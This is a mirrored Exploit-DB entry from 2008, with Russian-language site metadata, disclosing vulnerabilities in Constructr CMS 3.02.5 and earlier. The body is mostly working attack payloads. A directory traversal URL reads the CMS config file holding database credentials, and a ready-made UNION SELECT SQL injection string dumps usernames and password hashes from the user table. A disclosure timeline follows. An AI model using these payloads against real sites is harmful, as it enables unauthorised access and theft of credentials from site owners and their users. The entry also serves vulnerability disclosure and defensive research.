- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7529
- Проверка EDB
-
- Пройдено
- Автор
- FUZION
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5860 cve-2008-5859 cve-2008-5847
- Дата публикации
- 2008-12-19
Код:
Constructr CMS
http://constructr-cms.org/
- <= 3.02.5 "Stable" -
magic_quotes_gpc = Off
register_globals = On
- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=
Db info:
../config/config.inc.php
- SQL -
http://site/constructr/?show_page=
User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...
- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19
- Seasons Greetings -
- http://nukeit.org -
# milw0rm.com [2008-12-19]
- Источник
- www.exploit-db.com